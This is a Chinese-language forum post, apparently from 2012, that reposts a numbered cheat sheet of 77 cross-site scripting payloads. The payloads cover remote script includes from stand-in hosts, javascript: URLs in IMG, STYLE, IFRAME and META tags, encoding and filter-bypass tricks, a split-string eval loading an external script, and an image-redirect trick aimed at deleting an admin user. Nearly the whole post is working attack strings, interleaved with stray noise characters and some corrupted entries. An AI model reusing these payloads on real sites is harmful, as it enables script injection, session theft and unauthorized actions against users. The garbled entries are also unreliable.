貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! X0 m" Q- c' l* m
) E0 o7 x Z% \9 a! d3 F; z (1)普通的XSS JavaScript注入/ P6 ~8 d0 v: a" j5 w8 R* z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ d* A7 _! B' Q" \' u3 y0 z8 J& z
o: a8 { n* P7 o* I (2)IMG标签XSS使用JavaScript命令
9 Y: t$ T9 W* `# E <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 G s# @* ]( H% R# G: D9 o
2 b8 F k) t7 F9 U (3)IMG标签无分号无引号
@7 y/ B4 A& K1 X6 {3 H9 F L <IMG SRC=javascript:alert(‘XSS’)>6 X& S% M+ l9 T' ?- q6 d
5 L7 q# H; l/ O5 r( ?+ l, ~
(4)IMG标签大小写不敏感
# \1 x8 y0 H5 R <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 P/ ]4 \% K4 U" [4 Q# m. L
9 ~/ B: y, q2 Q2 a' [" E (5)HTML编码(必须有分号)
* m4 F& n0 J! h <IMG SRC=javascript:alert(“XSS”)>' q& q' f( o! o* ]* G( }
/ J; d; `# P& N (6)修正缺陷IMG标签. y! O& E- |( F; U
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>0 j/ S; m$ Y, I- I( ~
! S' V% Z; m$ W1 A7 O (7)formCharCode标签(计算器)3 R5 M w6 o8 I
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 I* e' j/ j, _: q: O" O% I
4 w- ^5 M6 s# g7 ^ (8)UTF-8的Unicode编码(计算器)
; }( b- x$ S. y: b# H" d4 }& _ <IMG SRC=jav..省略..S')>
5 J( B0 T( R5 S6 m
; f5 M; u# @0 C (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
2 r* o( @- z: I1 L1 G <IMG SRC=jav..省略..S')>1 U$ x% H W. B% p2 G( s' R' R
9 k; N$ O" p& a! p/ h; u7 x (10)十六进制编码也是没有分号(计算器)9 l- a. a$ e5 I
<IMG SRC=java..省略..XSS')>
$ Y9 ?: K) u# u; b( ^
0 \8 l( V; v- \# h- x4 w (11)嵌入式标签,将Javascript分开
3 Q1 a/ ~8 F p0 ?$ M' x$ L8 P <IMG SRC=”jav ascript:alert(‘XSS’);”>
: \- u, ]8 G2 r6 g s; E/ g3 ~! _* J6 c* q1 y7 H* R) y0 |
(12)嵌入式编码标签,将Javascript分开( ~: P) k+ {; M2 i9 m& g- {, \: R
<IMG SRC=”jav ascript:alert(‘XSS’);”>, |5 f$ t2 i; w( f1 |; z
, H! \1 H* k7 `4 F' |) E4 C
(13)嵌入式换行符
. H i' y- T- L" A* y* U <IMG SRC=”jav ascript:alert(‘XSS’);”>* O5 u; y! l5 [2 w% {
+ A0 h3 D, I k* g. m
(14)嵌入式回车
. @; L+ y: `5 y. y: C- ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>3 W% o& Q: n/ Q8 Y/ l5 Z
9 E& y% G/ J' I/ W9 V6 n R4 H2 z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 K- ?* @2 W% i' ]8 B <IMG SRC=”javascript:alert(‘XSS‘)”>9 H4 n& v5 O# M G1 ?: l
8 z* f; `, `! y3 r0 J1 a5 r
(16)解决限制字符(要求同页面)
6 D" k n. Q5 G4 x! [6 |) f% z <script>z=’document.’</script>% g0 l8 a9 w6 m; u
<script>z=z+’write(“‘</script>
) n: v' n. N/ \6 c1 w <script>z=z+’<script’</script>0 Q! H1 P6 Z2 j; _
<script>z=z+’ src=ht’</script>
( X# a G. z5 l0 g# Q <script>z=z+’tp://ww’</script>
7 U& Y- z5 d% u/ ]: l <script>z=z+’w.shell’</script>
; V1 w9 e4 f. [: u2 R <script>z=z+’.net/1.’</script>
' c! S1 G6 y1 J* K <script>z=z+’js></sc’</script>
2 C9 b. O0 Z; S' r; X+ e <script>z=z+’ript>”)’</script>$ M3 n8 W" h. Y& Y, Y5 p7 h
<script>eval_r(z)</script>" n' ~( |5 O2 }! j7 X
; O: B2 p6 r9 E2 j# n" E
(17)空字符
- k- Z; Z) g0 } perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 b, l1 |% q6 \( A
* C! _3 ^+ O# k
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用$ y$ B a/ Y6 B
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ s. c) ~4 `! \4 Y; z: y5 k
9 ]( p, O9 K) {" U5 k- P (19)Spaces和meta前的IMG标签
" [7 l! N5 t/ l9 F& c$ |1 X. t <IMG SRC=” � javascript:alert(‘XSS’);”>
' D: U% Z- h/ D3 r0 Y5 k
# ]+ n6 ^& _0 z/ i (20)Non-alpha-non-digit XSS
% |; n4 [& G. _6 Q: i# g <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 d$ f: Q; u b) i
) U& h- P5 S# P) l# f (21)Non-alpha-non-digit XSS to 2
* W' ~' J9 h Z& | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- q9 O# |- N# X8 D4 w0 O
: K4 C- |" l0 M" d! b5 J
(22)Non-alpha-non-digit XSS to 34 V0 z" f5 l' D! W f- h: U' I& Z
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' L1 B; }# _. `$ @8 ^4 u
0 l+ n" Y# i( l- \3 B# f5 N
(23)双开括号; e- x& r; T# C) L: P
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 W5 X" q8 ?7 a: c
4 Q. ~& @0 H0 B$ v* P$ Y2 m8 R, k (24)无结束脚本标记(仅火狐等浏览器)7 p$ J r' k$ i! l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ l& z$ ]* O/ C/ U4 B. m* P2 q/ k3 L' i4 x; g: Z# ^: Z) g$ i+ b
(25)无结束脚本标记2' |9 O' P3 q' M3 [( }
<SCRIPT SRC=//3w.org/XSS/xss.js>4 Y+ j w6 b j% o: s
$ J+ X. M H3 f, S6 C) \% m
(26)半开的HTML/JavaScript XSS; [9 p3 n; Z5 w' i
<IMG SRC=”javascript:alert(‘XSS’)”9 d6 u% [# @/ e' O) T v0 F+ i
, ]" i% a Q9 J' U" [/ ]% a
(27)双开角括号
- G! P& e2 C, d% c# a+ T8 w <iframe src=http://3w.org/XSS.html <
5 U3 @& f9 O7 V" d1 I1 P! Z; Z+ ?7 U! }% L4 x+ S
(28)无单引号 双引号 分号
( k2 O) }' W) O' i' v <SCRIPT>a=/XSS/
2 U/ ]3 n' Y+ L alert(a.source)</SCRIPT>0 N4 x _7 y! b
* B* f/ I6 s3 V: }8 k- D* {" ] (29)换码过滤的JavaScript
1 j: r$ N2 Q2 e* H \”;alert(‘XSS’);//9 s% ?; Z6 i8 g' x8 S$ b9 \
4 Q+ H7 n( r- n) C0 p (30)结束Title标签
) b6 g: \5 O8 o2 R </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
1 n3 \5 ]; K h
5 ]) G; p' c9 W/ d+ D (31)Input Image: ?. s( \7 ~* y
<INPUT SRC=”javascript:alert(‘XSS’);”>
' H. C/ o) K9 {) u4 ?2 @2 [1 s9 W. u2 U
(32)BODY Image
* ^8 x/ f* [" Q% P- B. D2 { <BODY BACKGROUND=”javascript:alert(‘XSS’)”>' f& m8 p* q9 ?: p2 L
% s9 O5 \ |6 p; ~& I2 f3 N (33)BODY标签
1 f( q6 x7 I! g <BODY(‘XSS’)>
' [$ ~) I1 R. @9 f) E4 M; a+ P; k" u, P1 k0 K
(34)IMG Dynsrc
3 ?5 u8 h: S* c, ? @5 I9 I* L' a <IMG DYNSRC=”javascript:alert(‘XSS’)”>9 B% H/ |5 e, N0 ?6 m
/ F* G) F* z& J+ _( }; u% @
(35)IMG Lowsrc
6 O$ [" x) }+ b( Y U2 H) A <IMG LOWSRC=”javascript:alert(‘XSS’)”>2 \) U" l3 B; K0 G" o2 H
( R! Z5 P, S0 H- u1 Y
(36)BGSOUND
. i& Z2 g, s' E <BGSOUND SRC=”javascript:alert(‘XSS’);”>& }# p* h |" Y' K Y5 L1 m3 \
4 V4 {. Y6 A U7 [. O
(37)STYLE sheet3 \5 J. P1 f- k- x! M3 A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 |' V; x/ ^- l( Q
! ? q3 R& G$ @! j* E, B (38)远程样式表8 w6 t% f. Q+ O' l+ D. D
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>/ a( ]+ v4 m f( B$ q! ^- R
, f( J" A6 }5 V) q
(39)List-style-image(列表式)+ M& X8 q* G9 t
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( o) B) W/ I4 Z. e9 a( A; N
+ w. p; m9 G) }9 R (40)IMG VBscript4 [. e6 i# r# t7 u: B
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS9 ~% d' \" q. w; c9 I8 v) L
; \/ \# l) q3 u. r2 z; i0 s
(41)META链接url4 j% K! x) t) J
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' p8 M7 ]. s& q$ C& d' [. V, @
* i1 b/ k* G) p/ }! f* Z! L (42)Iframe
' k1 Y( ^2 H& n, e' `3 }+ R0 u$ k <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ t" z; d, c# q. L! l3 a# m
. u( f7 T- Y& J: n Q$ N (43)Frame3 \! X! O- O5 Y: r* n& e
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
% V+ o5 |$ m" w, I9 a$ S$ A& B* _9 `) |
(44)Table
+ X+ A/ d8 M8 n" @8 p+ F8 i- y <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! `; o9 ^2 q; M" \, m8 [
: ~1 i, i/ P! @2 Z( Y, s (45)TD9 y# l5 f( ]+ U7 E! p+ F2 T
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 J( ` v. [; U, G' w3 x0 B
' N6 E% P( l" {( G3 H: ` (46)DIV background-image
. D. F4 U* w; @) |/ i <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) G* I; J6 x- R2 W) `3 x6 s0 }' T. V) B8 n
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
% \8 o4 ~- \. l/ e" ` <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>3 t* ]* }: p* J2 [
]6 N( _9 B' i (48)DIV expression$ n) y- o/ O2 w4 I# H3 I
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. I! J* B+ O/ D; F, S
, x0 ~3 y0 u/ ?- f/ g# Q
(49)STYLE属性分拆表达
) W+ `/ V) f4 ?3 k% R$ m$ y <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ d! a* r6 { Y* @7 T- G, I
6 p8 J; y. K) ~: _( T (50)匿名STYLE(组成:开角号和一个字母开头)
7 s" N1 m2 q/ [+ x <XSS STYLE=”xss:expression_r(alert(‘XSS’))”># F8 |7 O0 a, _) A" m! \& T4 q6 g; F
" a9 A+ C p7 m" G ? (51)STYLE background-image& s3 G, W4 |, [9 q" _
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>7 O b O& M+ `
4 t' i9 n; x1 N& W (52)IMG STYLE方式3 F% s; i+ t! f5 W' s: \' e
exppression(alert(“XSS”))’>
: `5 D' L+ L& S
% p# R5 r4 @0 ~9 t/ j0 T (53)STYLE background
; y* ^8 R8 x/ p0 {6 D# P1 X <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> i. ~1 B8 y4 {
5 q* _1 S# Y0 |# C4 ]" I. \7 {. F$ n
(54)BASE9 m8 j+ r+ T1 u' n
<BASE HREF=”javascript:alert(‘XSS’);//”>
+ I6 L$ `0 w9 q$ L$ T
$ d& R3 |9 K" p" c- a8 } (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% P" R7 `9 x4 }2 Z5 R$ M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 [: P/ Q4 ?4 ^3 V" B3 I
% p' R4 J2 v0 B. D! Q% Y" Z (56)在flash中使用ActionScrpt可以混进你XSS的代码; x: [4 F) g% G! F' O: K
a=”get”;
( |& L r- o$ r! ^$ l2 [- ^% Z/ d b=”URL(\”";- V% t$ O5 _0 ]5 v, _3 X
c=”javascript:”;
5 B3 n& Z$ A2 S7 j( E d=”alert(‘XSS’);\”)”;
; B4 K; Y( \$ w! D eval_r(a+b+c+d);
' I& U/ V/ t1 A3 K8 t& E" K. T! e- l9 h# R5 _3 V- t) r
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 Y6 w+ N( _. _4 v2 M. s& D <HTML xmlns:xss>
. ~. u9 f6 E" k; i* Y5 ] j <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( H: m& v" @" G
<xss:xss>XSS</xss:xss>) g, j7 h; q* i: }" I/ L& y6 c$ L
</HTML>
* |! X6 E: O( X* T x( ~
1 O& t* X; w8 f0 Z (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
+ q* z# [* O+ g% ]" n1 B <SCRIPT SRC=””></SCRIPT>/ m2 k( y; z [
9 \+ n- {! a" ` (59)IMG嵌入式命令,可执行任意命令% A9 G. k. \; e
<IMG SRC=”http://www.XXX.com/a.php?a=b”>" F [0 K" E5 o" m; s
- i, C2 H8 }8 m# s
(60)IMG嵌入式命令(a.jpg在同服务器)7 }; ~6 V/ k; p1 H! Z1 k. ]
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser9 u. o: \5 X8 w, ~; h& a
' d* c+ W; c _2 J6 D
(61)绕符号过滤
, d7 a! H/ o, K/ d: d <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* W, m, [& i; n- G0 r. N
" C7 h* B* j9 |+ L% U0 H( W (62). \* z6 x7 B6 \0 G. ?
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 z2 ~7 g, m( }4 E9 `; C; _: Y% A$ H" {
. F1 O* @) u( O$ P
(63)
' e D- x& T; [( _ <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ C3 g) U% l, Y# M
: p; w. G3 `8 y+ w4 p/ I( H
(64)- [' E# n4 B" B; E4 h3 r
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
* c8 T, C; D8 b/ }0 A1 u6 ^
2 F; Q$ \9 O1 `- A& J$ K2 g (65)
7 `5 |3 m- Q+ b8 K1 t <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
6 F: w7 M9 K+ x% B- ~ v6 L, q) ]
(66)7 N# j- F0 Q7 `8 M" U9 Z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
( Z9 X3 j. @0 g" b% B4 T' v/ e0 y; W; z8 x0 v! [' J. X% h
(67)# h6 g) L4 r" n- z# E8 g0 N
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. d9 V* v/ e/ o8 a+ q# u
* Z: P9 A+ s% A; L# |# @7 H/ g( w$ Z (68)URL绕行# `! H9 s/ R" R" i" h- T
<A HREF=”http://127.0.0.1/”>XSS</A>
* }, R6 T! V2 x# A+ [* U( n* a1 v% x9 Z# o
(69)URL编码
- a' z7 J0 E6 }/ z8 y+ _: H <A HREF=”http://3w.org”>XSS</A>
( h0 N+ l4 X k' X+ y; l
! G7 [' ~! F& f' K& \9 Z* ?2 x (70)IP十进制6 V2 P; E# J0 P! [; |$ @. h
<A HREF=”http://3232235521″>XSS</A>6 N( A7 Q6 Y! F; v+ p
& D2 w% @+ a* K6 ~( t (71)IP十六进制
8 T- D6 E0 O; F7 A4 X( p$ c <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% O; ]1 a0 |$ I
% E" |! [6 \5 E# l (72)IP八进制
1 \+ T* ~3 d" G" G+ t# ^) X <A HREF=”http://0300.0250.0000.0001″>XSS</A>
3 c) K6 K! Y5 x+ e: W6 F! u v! F% i" k2 ~9 I/ a
(73)混合编码: N* o! W) @9 T
<A HREF=”h
a7 |# H5 Z$ j. p2 C0 u7 c$ c8 S8 _ tt p://6 6.000146.0×7.147/”">XSS</A>% n7 i. _) M$ t, S
& x7 g% R R: K9 e d (74)节省[http:]$ T# t% ~2 W8 J: E% |9 x9 \
<A HREF=”//www.google.com/”>XSS</A>1 A; q2 i: F( v, c
) L1 k* ]- N7 j! W0 w
(75)节省[www]
( W% V8 c" _1 A <A HREF=”http://google.com/”>XSS</A>1 f; o: H2 Y: b# h
+ [8 ?! o8 L0 u: o1 ]# o (76)绝对点绝对DNS6 J# B2 }/ k# u* n4 o7 c7 e
<A HREF=”http://www.google.com./”>XSS</A>% `6 y1 D* d) b8 l$ ^1 j* g
* {# {: _% U% M! `, v (77)javascript链接/ M+ K# V R8 S% x% n1 P: }
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对